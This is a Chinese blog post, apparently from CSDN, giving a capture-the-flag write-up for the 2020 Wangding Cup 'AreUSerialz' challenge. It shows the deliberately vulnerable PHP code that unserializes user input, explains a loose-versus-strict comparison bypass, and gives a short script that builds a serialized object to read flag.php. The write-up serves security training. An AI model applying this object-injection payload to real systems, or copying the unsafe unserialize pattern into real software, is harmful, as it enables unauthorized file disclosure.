php反序列化题目——2020-网鼎杯-青龙组-Web-AreUSerialz

最新推荐文章于 2024-07-15 15:59:36 发布
最新推荐文章于 2024-07-15 15:59:36 发布
阅读量203 收藏
点赞数
分类专栏: 靶场和漏洞练习 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131565633
版权

打开题目环境,出现一连串php代码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

先进行代码分析,大致意思如下:
首先,网站包含了flag.php文件,页面以GET的方法接收str参数,并对str参数进行反序列化操作unserialize()函数,反序列化后会生成类FileHandler,PHP函数结束前,会触发魔术方法__destruct()函数,__destruct()函数会设置变量op的值,并且触发process()函数,process()函数会根据op的值来进行read()和write()方法。
显然,我们想要获取flag,肯定希望页面实行read操作,并且设置filename变量为flag.php。而在process()函数中,只有op变量的值为2时才会触发read()方法。而如果我们直接设置op变量的值为2,在__destruct()函数中就会强制性的将该值修改为1。
但是,我们注意到__destruct()函数中比较使用了三个等号,而process()方法中的比较使用了两个等号。在PHP语言中,===检测值和类型,==检测值。因此,在这里,我们可以设置op变量的值为数字2,或者采用加空格的方式绕过(令op=’ 2’),这样一来,在__destruct()方法中,数字2不等于字符串2,因此__destruct()函数不会修改op变量的值,而在process()函数中,数字2和字符串2的值是相等的,因此会使得程序执行后续的read()函数。

下面我们开始构造序列化的php代码:

<?php
class filehandler{
    public $op=2;
    public $filename= 'flag.php';
    public $content;
}
$a = new filehandler();
$b = serialize($a);
echo $b;
?>

代码运行结果:
在这里插入图片描述
将上述运行结果以get方式传参给str变量,发现页面没有flag,右键查看源代码发现flag值:
在这里插入图片描述

Coisini话不投机养乐多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
网鼎杯2020php反序列化,网鼎杯2020[青龙]--AreUSerialz
weixin_35304361的博客
04-15 396
知识点:PHP反序列化漏洞弱类型比较process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->outp...
PHP反序列化-2020-网鼎杯-青龙-Web-AreUSerialz
m0_62770485的博客
04-17 3206
PHP反序列化 序列化(serialize)就是将对象转换为字符串。反序列化(unserialize)则相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象 访问控制 PHP 对属性或方法的访问控制,是通过在前面添加关键字 public(公有),protected(受保护)或 private(私有)来实现的。 public(公有):公有的类成员可以在任何地方被访问。 protected(受保护):受保护的类成员则可以被其自身以及其子类和父类访问。 private(私有):私有的类
网鼎杯php反序列化 AreUserialz
weixin_54431413的博客
04-16 2210
2020网鼎杯php反序列化AreUserialz
2020-网鼎杯-phpweb | 代码审计与PHP反序列化
一醉一休的博客
08-15 573
调用gettime方法,进而执行call_user_func函数,把func参数作为回调函数,p参数作为回调函数的参数,再根据PHP变量类型决定是否返回。发现有file_get_contents函数没有被过滤,配合第二个参数进行操作查看源码(没看源码前怎么知道参数会这样配合,蒙ing…、先传入参数,判断参数func是否包含disable_fun这个数里面的函数。存在两个参数func和p,对参数func进行fuzz测试。反序列化,利用call_user_func函数进行绕过。构造脚本payload。...
PHP第五周答案,合天实验室第五周(easy upload)
weixin_42113552的博客
04-11 525
打开浏览器,输入地址,发现是个文件上传。这个时候,查看下源码。我们发现,上传文件的格式有要求。所以这个时候,我们打开资源管理器里面,看下,有没有图片让我们用。我们开始上传图片。得到第一个提示。它要我们给它一个叫做give_me_flag.php的文件,这个时候,就想到了使用burpsuite去改包。将filename的值改成give_me_flag.php然后forward一下。得到第二个提示。这...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
CVE-2020-9484的根源在于错误配置和`org.apache.catalina.session.FileStore`件中的本地文件包含(LFI)以及反序列化问题。当Tomcat配置使用`org.apache.catalina.session.PersistentManager`作为会话管理器,并且...
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
此外,还提到了一个2020网鼎杯竞赛的复现案例,其中涉及到Java Web应用的SQL注入和反序列化漏洞。 首先,我们要理解序列化和反序列化的基本概念。序列化是将对象转换为可存储或传输的格式,而反序列化则是将这些...
64-64.渗透测试-PHP序列化与反序列化.mp4
05-10
64-64.渗透测试-PHP序列化与反序列化.mp4
php反序列化java.long_一道php反序列化
weixin_29447549的博客
02-13 270
2020网鼎杯青龙)--WEB--AreUSerialz反序列化
a965527596的博客
05-17 2315
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
PHP反序列化漏洞&网鼎杯ctf实例
weixin_44769042的博客
09-22 1126
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
PHP编程开发工具有哪些?
红客网络编程与渗透技术
07-10 1035
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 1011
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 416
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 584
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
ns3-gym入门(二):linear-mesh例子详解
最新发布
zoe2222226666的博客
07-15 737
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
16、MapReduce的基本用法示例-自定义序列化、排序、分区、分和topN
05-29
接着,作者在MapReduce作业中使用ScoreWritable类作为数据类型,通过自定义序列化方式,实现了对数据的序列化和反序列化操作。 然后,作者讲解了排序功能的实现。在MapReduce作业中,通过自定义KeyComparator类,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值